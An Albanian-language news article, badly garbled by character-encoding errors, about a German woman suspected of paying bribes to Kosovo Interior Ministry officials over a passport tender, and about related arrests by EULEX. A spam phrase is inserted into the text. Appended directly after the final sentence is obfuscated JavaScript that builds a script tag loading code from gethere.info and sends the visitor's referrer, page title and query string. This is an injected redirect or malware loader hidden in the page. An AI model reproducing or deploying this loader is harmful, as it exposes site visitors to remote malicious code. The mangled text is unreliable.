natali

Dyshohet se ua ka bartur paratA� zyrtarA�ve tA� shtetit

secure medical prescription . Gjermania Natali Velija dyshohet se nuk i ka marrA� 1.4 milionA� eurot tA� gjitha pA�r vete, por i ka derdhur nA� katA�r llogari bankare si ryshfet pA�r zyrtarA� tA� shtetit.

PA�r kA�tA� ajo ka qenA� e gatshme tA� dA�shmonte tA� hA�nA�n nA� Prokurori pA�r tA� a�?zbardhur korrupsionina�? nA� MinistrinA� e PunA�ve tA� Brendshme, por, sipas mbrojtA�sit tA� saj, prokurorA�t e rastit nuk kanA� dashur ta dA�gjonin, shkruan a�?Koha Ditorea�?.

TA� martA�n ajo nuk ka pranuar tA� fliste fare gjatA� njA� tentative pA�r ta intervistuar, sepse ka thA�nA� se nuk A�shtA� nA� gjendje tA� flasA�.

Burime tA� KD brenda procesit kanA� thA�nA� se pronarja e kompanisA� a�?Consulting EU Sh.p.a�? ka transferuar mbi njA� milion euro me katA�r kosovarA� si ryshfet tA� tenderit prej 14 milionA� eurosh pA�r prodhimin e pasaportave tA� fituar nga kompania austriake a�?A�sterreichische Staatsdruckereia�? (OeSD).

Velija po mbahet nA� arrest nga policia e EULEX-it. SA� bashku me tA�, EULEX-i mbrA�mjen e sA� hA�nA�s ka arrestuar edhe dy persona tA� tjerA� qA� dyshohen se kanA� bashkA�punuar me tA�.

Nga burime tA� gazetA�s a�?Expressa�? mA�sohet se tA� arrestuarit janA� dy vA�llezA�r, Betim dhe Fisnik Blakaj nga Istogu.

Veliajn tA� martA�n e kanA� vizituar nA� polici edhe pA�rfaqA�suesit e AmbasadA�s gjermane. Avokati i saj, TomA� Gashi, konfirmon se Ambasada e GjermanisA� A�shtA� se kundA�r saj ka pasur keqtrajtim psikik, derisa ajo ka qenA� nA� kolaps total dhe ka pA�rfunduar nA� emergjencA�.

Sipas Gashit, klientja e tij A�shtA� vetA�m viktimA� e kA�tij rasti tA� madh, prapa sA� cilA�s qA�ndrojnA� zyrtarA�t e MinistrisA� sA� PunA�ve tA� Brendshme.

a�?Natalia tani pA�r tani mund tA� jetA� vetA�m si viktimA�, por duket se dikush e ka zgjedhur rrugA�n pak mA� tA� shkurtA� qA� kA�tA� ta viktimizojA� pA�r ta��u mbyllur njA� aferA� korruptive e pA�rmasave milionA�she, ku qA�ndrojnA� zyrtarA�t e lartA� tA� MPBa��sA�a�?, tha Gashi.

ZyrtarA�t e MPB-sA� nuk dA�shirojnA� tA� komentojnA� asgjA� pA�r rastin e arrestimit dhe akuzat e gjermanes Veliaj pA�r zyrtarA�t e kA�saj ministrie. Bajram Rexhepi tha shkurt pA�r a�?Expressa�? se MPB nuk ka dorA� nA� kA�tA� skandal dhe se hetimet do tA� ndriA�ojnA� rastin.

Arrestimin e vA�llezA�rve Blakaj e ka konfirmuar babai i tyre. Duke mos dashur qA� ta��i publikohet emri nA� gazetA�, babai i djemve tA� arrestuar thotA� tA� mos jetA� aspak nA� dijeni pA�r pA�rfshirjen e tyre nA� kA�tA� aferA�. Ai sqaron se Betimi A�shtA� student nA� PrishtinA�, ndA�rsa Fisniku e ka nA� pronA�si njA� autolarje rrugA�s pA�r FushA�-KosovA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}